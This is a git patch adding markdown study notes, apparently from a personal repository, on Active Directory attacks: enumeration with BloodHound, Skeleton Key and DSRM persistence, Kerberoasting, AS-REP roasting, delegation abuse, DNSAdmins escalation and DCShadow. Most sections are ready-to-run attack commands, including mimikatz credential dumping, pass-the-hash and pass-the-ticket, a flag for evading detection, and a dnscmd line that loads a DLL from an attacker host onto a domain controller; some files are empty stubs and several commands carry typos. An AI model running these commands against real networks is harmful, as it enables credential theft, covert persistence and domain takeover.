From 38f3d51121e8a7f6b405e4b0bfce972895135740 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Thu, 9 Dec 2021 17:11:17 +0500
Subject: [PATCH] Add files via upload

---
 .../Domain Enumeration/Bloodhound.md          |  21 +++
 .../Domain Persistance/3-Skeleton Key.md      |  22 +++
 Active Directory/Domain Persistance/4-DSRM.md |  65 +++++++++
 .../Domain Persistance/5-Custom SSP.md        |   2 +
 .../Domain Persistance/6-ACLs (pending).md    |   1 +
 .../7-Security Descriptor (pending).md        |   2 +
 .../1-Kerbeorasting.md                        |  54 ++++++++
 .../2-AS REP Roasting.md                      |  54 ++++++++
 .../3-Set SPN (pending ,video 15).md          |   2 +
 .../4-Delegation.md                           | 126 ++++++++++++++++++
 .../Domain Privilege Escalation/5-DNSAdmin.md |  39 ++++++
 .../Enumeration/4-ACL (pending).md            |   3 +
 .../1-Cross Forest Attacks (pending).md       |  21 +++
 .../2-Forest Persistence DC Shadow.md         |   2 +
 14 files changed, 414 insertions(+)
 create mode 100644 Active Directory/Domain Enumeration/Bloodhound.md
 create mode 100644 Active Directory/Domain Persistance/3-Skeleton Key.md
 create mode 100644 Active Directory/Domain Persistance/4-DSRM.md
 create mode 100644 Active Directory/Domain Persistance/5-Custom SSP.md
 create mode 100644 Active Directory/Domain Persistance/6-ACLs (pending).md
 create mode 100644 Active Directory/Domain Persistance/7-Security Descriptor (pending).md
 create mode 100644 Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md
 create mode 100644 Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md
 create mode 100644 Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md
 create mode 100644 Active Directory/Domain Privilege Escalation/4-Delegation.md
 create mode 100644 Active Directory/Domain Privilege Escalation/5-DNSAdmin.md
 create mode 100644 Active Directory/Enumeration/4-ACL (pending).md
 create mode 100644 Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md
 create mode 100644 Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md

diff --git a/Active Directory/Domain Enumeration/Bloodhound.md b/Active Directory/Domain Enumeration/Bloodhound.md
new file mode 100644
index 0000000..e712b28
--- /dev/null
+++ b/Active Directory/Domain Enumeration/Bloodhound.md	
@@ -0,0 +1,21 @@
+# Domain Enumeration - Bloodhound
+
+Bloodhound is useful for gathering AD entities , relationships , it uses graph theory for providing the capability of mapping shortest path for interesting thing , it can find interesting things like `Domain Admins` , it has built-in queries.
+
+https://github.com/BloodHoundAD/BloodHound
+
+## Sharphound
+
+https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
+
+### Generate archive 
+
+```
+Invoke-BloodHound -CollectionMethod All
+```
+
+### Avoiding detection form Advanced Threat Analytics (ATA)
+```
+Invoke-BloodHound -CollectionMethod All -ExcludeDC
+```
+
diff --git a/Active Directory/Domain Persistance/3-Skeleton Key.md b/Active Directory/Domain Persistance/3-Skeleton Key.md
new file mode 100644
index 0000000..c23be6d
--- /dev/null
+++ b/Active Directory/Domain Persistance/3-Skeleton Key.md	
@@ -0,0 +1,22 @@
+# Domain Persistance - Skeleton key
+
+A Skeleton key is like a malware that is injected into LSASS process of Domain controller (DC), for this to achieve we need to be a domain admin in order to perfrom this , doing this will create a master password for all accounts in a domain ,existing passwords for those account will still work, this attack is done through `mimikatz`. The master password will not change until DC is rebooted 
+
+## mimikatz.exe
+
+```
+privilege::debug
+misc::skeleton
+```
+
+
+## Mimikatz powershell
+```
+Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -Computer computername.domain
+```
+
+Then we can just switch to other user
+
+```
+Enter-PSSession -ComputerName computername -Credential
+```
diff --git a/Active Directory/Domain Persistance/4-DSRM.md b/Active Directory/Domain Persistance/4-DSRM.md
new file mode 100644
index 0000000..480c908
--- /dev/null
+++ b/Active Directory/Domain Persistance/4-DSRM.md	
@@ -0,0 +1,65 @@
+# Domain Persistance - DSRM
+
+Directory Service Restore Mode (DSRM) , every `Local Administrator` on Domain Controller `DC` is named `Administrator` account , this Administrator is called DSRM account and DSRM password is set when a DC is promoted.
+
+So it is possible to perfrom `Pass The Hash` attack after extracting NTLM hash of Local Administrator account , local administrator password is just a backup password if something goes wrong ,usually local administrator isn't used by DC
+
+## Using mimikatz.exe
+```
+privilege:debug (to see privileges)
+token::elevate  (to become NT AUTHORITY\SYSTEM)
+```
+
+### Extracting Local Administrator password hash
+```
+lsadump::sam
+```
+
+### Extracting Domain Administrator password hash
+
+```
+lsadump::lsa /patch
+```
+
+By default DSRM logon is disbaled , value is set to 0 , set the value to 2
+
+```
+Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbos
+```
+
+if this entry doesn't exist , we can create it 
+
+```
+New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
+```
+
+Then 
+
+```
+sekurlsa::pth /user:Administrator /domain:dominname /ntlm:ntlm_hash_of_local_admin
+```
+
+## Using mimikatz powershell
+
+This is for local administrator
+
+```
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam""' -Computername computername 
+```
+
+This is for domain admin
+
+```
+Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername computername
+```
+
+now performing pass the hash
+
+```
+Invoke-Mimikatz -Command '"sekurlsa::pth /domain:domainname /user:Administrator /ntlm:local_admin_hash /run:powershell.exe"'
+```
+
+
+```
+Enter-PSsession -Computername computer
+```
\ No newline at end of file
diff --git a/Active Directory/Domain Persistance/5-Custom SSP.md b/Active Directory/Domain Persistance/5-Custom SSP.md
new file mode 100644
index 0000000..34c1eda
--- /dev/null
+++ b/Active Directory/Domain Persistance/5-Custom SSP.md	
@@ -0,0 +1,2 @@
+# Domain Persistance - Custom SSP
+SSP stands for Security Support Provider 
\ No newline at end of file
diff --git a/Active Directory/Domain Persistance/6-ACLs (pending).md b/Active Directory/Domain Persistance/6-ACLs (pending).md
new file mode 100644
index 0000000..272eddf
--- /dev/null
+++ b/Active Directory/Domain Persistance/6-ACLs (pending).md	
@@ -0,0 +1 @@
+# Domain Persistance - ACLs
\ No newline at end of file
diff --git a/Active Directory/Domain Persistance/7-Security Descriptor (pending).md b/Active Directory/Domain Persistance/7-Security Descriptor (pending).md
new file mode 100644
index 0000000..2511d91
--- /dev/null
+++ b/Active Directory/Domain Persistance/7-Security Descriptor (pending).md	
@@ -0,0 +1,2 @@
+# Domain Persistance - Security Descriptor
+
diff --git a/Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md b/Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md
new file mode 100644
index 0000000..5cc300a
--- /dev/null
+++ b/Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md	
@@ -0,0 +1,54 @@
+# Domain Privilege Escalation - Kerberoasting
+
+Kerberoasting isn't an exploit or an attack it's abusing feature of windows for authenticating users in AD , 
+
+## Steps in Kerberos
+
+- User logs on with username & password.
+
+- Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request  Authenitcation Service Request (AS-REQ).  The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).
+
+- The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
+
+- **The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.**
+
+- **The TGS is encrypted using the target service accounts’s NTLM password hash and sent to the user (TGS-REP).**
+
+- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
+
+- Optional mutual authentication is done by service that the user provides TGS ticket to
+
+## Kerberoasting 
+
+Ticket Granting Service `TGS` has a server portion which is encrypted with service account's NTLM hash , we can request a TGS for a particular service when we want to connect to it and then cracking the hash , service accounts are usually ignored as passwords aren't changed and they might have some privileges. This can be used to create silver tickets. 
+
+In order to do this we need to have a valid domain user and there must be a SPN attached to a user (service account)
+
+## PowerView commands
+
+### Finding usser accounts used as a service account
+
+```
+Get-NetUser -SPN
+```
+
+### Request a TGS
+```
+Request -SPNTicket
+```
+
+## AD Module
+
+### Finding usser accounts used as a service account
+
+```
+Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
+```
+
+### Request a TGS
+```
+Add-Type -AssemblyName System.IdentityModel
+
+New-Object System.IdentityModel.Toekns.KerberosRequestorSecurityToken -ArgumentList "MSSQLSVC/computername.domainname"
+```
+
diff --git a/Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md b/Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md
new file mode 100644
index 0000000..f0f8cec
--- /dev/null
+++ b/Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md	
@@ -0,0 +1,54 @@
+# Domain Privilege Escalation - AS REP Roasting
+
+If pre-authentication is disabled on a user account or a service account , meaning that UserAccountControl settings have `Don not require Kerberos preauthentication`, then it is possbile to request a TGT for that user account without any password but a valid username is required
+
+## Steps in Kerberos
+
+- **User logs on with username & password.**
+
+- **Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request  Authenitcation Service Request (AS-REQ).  The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).**
+
+- **The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.**
+
+- The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.
+
+- The TGS is encrypted using the target service accounts’s NTLM password hash and sent to the user (TGS-REP)
+
+- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
+
+- Optional mutual authentication is done by service that the user provides TGS ticket to
+
+## PowerView (dev)
+
+### Enumerating accounts with Kerberos preauth disabled
+
+```
+Get-DomainUser -PreauthNotRequired -Verbose
+```
+
+### Request encrypted AS-REP for offline brute force 
+
+## AD Module
+
+### Enumerating accounts with Kerberos preauth disabled
+
+```
+Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
+```
+
+## ASREP Roast
+
+https://github.com/HarmJ0y/ASREPRoast
+
+
+### Request encrypted AS-REP for offline brute force
+
+```
+Get-ASREPHash -Username user -Verbose
+```
+
+### To enumerate all users with kerberos preauth disable and request a hash
+
+```
+Invoke-ASREPRoast -Verbose
+```
\ No newline at end of file
diff --git a/Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md b/Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md
new file mode 100644
index 0000000..cda15df
--- /dev/null
+++ b/Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md	
@@ -0,0 +1,2 @@
+# Domain Privilege Escalation - Set SPN
+
diff --git a/Active Directory/Domain Privilege Escalation/4-Delegation.md b/Active Directory/Domain Privilege Escalation/4-Delegation.md
new file mode 100644
index 0000000..7373824
--- /dev/null
+++ b/Active Directory/Domain Privilege Escalation/4-Delegation.md	
@@ -0,0 +1,126 @@
+# Domain Privilege Escalation - Delegation
+
+Kerberos delegation allows to re use user's credentials to access resources hosted on a different server , this is done in mult-tier service where kerberos double hop is required
+
+Delegation could look like this where a user authenticates to web server , web server makes requests to database server but not as web service account but as the user account (that has authenticated)
+
+## Steps in delegation
+
+- User provides credentials to domain controller (DC)
+
+- DC returns a Ticket Granting Ticket (TGT)
+
+- User requests a Ticket Granting Service (TGS) for the service he wants to connects , let's say web service
+
+- User sends TGT and TGS to web server
+
+- Web service account uses the user's TGT to request to another service to use , let's assume database service
+
+- Web server's account connects to database server as the user 
+
+## Types of delegations
+
+There are 2 types of delegations
+
+- Unconstrained Delegation
+- Constratined Delegation
+
+## Unconstrained Delegation
+
+Unconstrained delegation allows first hop server to request access to any service on any computer in domain
+
+The way this delegation works is that domain controller places Ticket Granting Ticket (TGT) in Ticket Granting Service (TGS) , TGT is extracted from the TGS and TGT is stored in LSASS by the server , this way server can reuse user's TGT to access any resource in the domain as the user.
+
+# PowerView
+
+### Discover domain computers which have unconstrained delegation
+
+```
+Get-NetComputer -UnConstrained
+```
+
+## AD Module
+```
+Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+Get-ADUser -Filter {TrustedForDelegation -e $True}
+```
+
+# Mimikatz
+
+After finding that which computer or service has unconstrained delegation enabled , we will need to make a domain admin login to that service/computer and with administrative privileges on that computer we can use mimikatz to list the avaiable tickets in the session , as in unconstrained delegation , TGT will be loaded in LSASS so we can use that to get domain admin
+
+## Check if any domain admin token is available
+
+```
+Invoke-Mimikatz -Command '"sekurlsa::tickets"'
+```
+
+By running this command we can see a administrator token so use the command below to do `ptt` pass the ticket to load it into the current sessions
+
+```
+Invoke-Mimikatz -Command '"kerberos::ptt location_of_the_ticket(C:\Users\user\Documents\ticket_something)"'
+```
+
+## Constrained Delegation
+
+Constrained delegation allows first hop to request access to specific services on specific computers. It allows access only to specified services on specified computers as a user.
+
+It doesn't use kerberos when authenticating the user ,when a user authenticates to a web service , and the user requests something from database ,web server makes a requests using the authorized user account,   to impersonate the user  , `Service For user (S4U) extension is used ` that has two extensions
+
+- Service for user to self (S4U2Self) , it allows a service to obtain forwardable TGS to itself on behalf of a user. This must have `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION`
+- Service for User to proxy (S4U2Proxy) , it allows a service to obtain a TGS for second service on behalf of authorized user. This is controlled by `msDS-AllowedToDelegateTo` attribute that contains list of SPNs to which user tokens can be forwarded
+
+## Steps in constrained delegation
+
+- A user authenticates to web serivce using non kerberos authentication mechanism.
+
+- Web service requests a ticket from DC/KDC for the user's account without supplying the password as web service account.
+
+- KDC checks if web service account has  `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` attribute and also if the user isn't blocked for delegation , then it forwards a S4U2Self ticket for the user's account.
+
+- Service then passes this ticket back to KDC and a request a service ticket for the another service let's say Database service.
+
+- KDC checks if  `msDS-AllowedToDelegateTo` is on the web service account ,if service is listed then it will return the token for database service (S4U2proxy).
+
+- Web service can now authenticate to database service as the user's TGS to that service.
+
+
+### PowerView (dev)
+
+#### Enumerate users and computers with constrained delegations enabled
+
+```
+Get-DomainUser -TrustedToAuth
+Get-DomainComputer -TrustedToAuth
+```
+
+### AD Module
+
+#### Enumerate users and computers with constrained delegations enabled
+
+```
+Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null" -Properties msDS-AllowedToDeleagteTo}
+```
+
+### Kekeo.exe
+
+### Using `asktgt`  we will first get the TGT of  the service account that is allowed to delegate
+
+```
+tgt::ask /user:username /domain:domainname /rc4:ntlm_hash_of_user
+```
+
+### Using `s4u` , we request a TGS as any user on the service which we have permission to delegate
+
+```
+tgs::s4u /tgt:TGS_Ticket_of_service_account /user:Administrator@domainname /service:mssql
+```
+
+### Now using mimikatz , we can use pass the ticket to load the ticket in powershell session
+
+```
+Invoke-Mimikatz -Command '"kerebros::ptt administrator_ticket"'
+```
+
+
+
diff --git a/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md b/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md
new file mode 100644
index 0000000..054beaf
--- /dev/null
+++ b/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md	
@@ -0,0 +1,39 @@
+# Domain Enumeration - DNSAdmins
+
+
+Members of `DNSAdmins` could load arbitary DLL with the privileges of dns.exe , if Domain Controller (DC) servers as DNS , we can perform escalation to Domain Admins (DA)
+
+## Powerview
+
+### Enumerate members of DNSAdmins group
+
+```
+Get-NetGroupMember -GroupName "DNSAdmins"
+```
+
+## AD Module
+
+### Enumerate members of DNSAdmins group
+
+```
+Get-ADGroupMember -Identity DNSAdmins
+```
+
+### Configure DLL using `dnscmd.exe`
+```
+dnscmdd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll
+```
+
+### Restart dns service
+
+```
+sc.exe stop dns
+sc.exe sart dns
+```
+
+
+
+Or alternatively follow this 
+
+
+https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b
\ No newline at end of file
diff --git a/Active Directory/Enumeration/4-ACL (pending).md b/Active Directory/Enumeration/4-ACL (pending).md
new file mode 100644
index 0000000..ca58ebc
--- /dev/null
+++ b/Active Directory/Enumeration/4-ACL (pending).md	
@@ -0,0 +1,3 @@
+# Domain Enumeration - Access Control List
+
+## 
\ No newline at end of file
diff --git a/Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md b/Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md
new file mode 100644
index 0000000..00502e2
--- /dev/null
+++ b/Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md	
@@ -0,0 +1,21 @@
+# Forest Attacks - Cross Forest Attacks
+DCShaodw temporarliy registers a new domain controller in the domain and uses it to push attributes like SIDHistory , SPNs and etc without leaving change logs for objects.
+
+New domain controller is registered by modifying configuration , SPNs of existing computer object and couple of RPC services
+
+
+## Mimikatz
+
+We need two instances of mimikatz for `DCShadow`
+
+```
+!+
+!processtoken
+lsadump::dcshadow /objec:rootuser /attribute:Description /value="Hello from DCShadow"
+```
+
+And the second instance with domain admin privileges 
+
+```
+lsadump::dcshadow /push
+```
diff --git a/Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md b/Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md
new file mode 100644
index 0000000..28f0ea3
--- /dev/null
+++ b/Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md	
@@ -0,0 +1,2 @@
+# Forest Attacks - Forest Persistence DC Shadow
+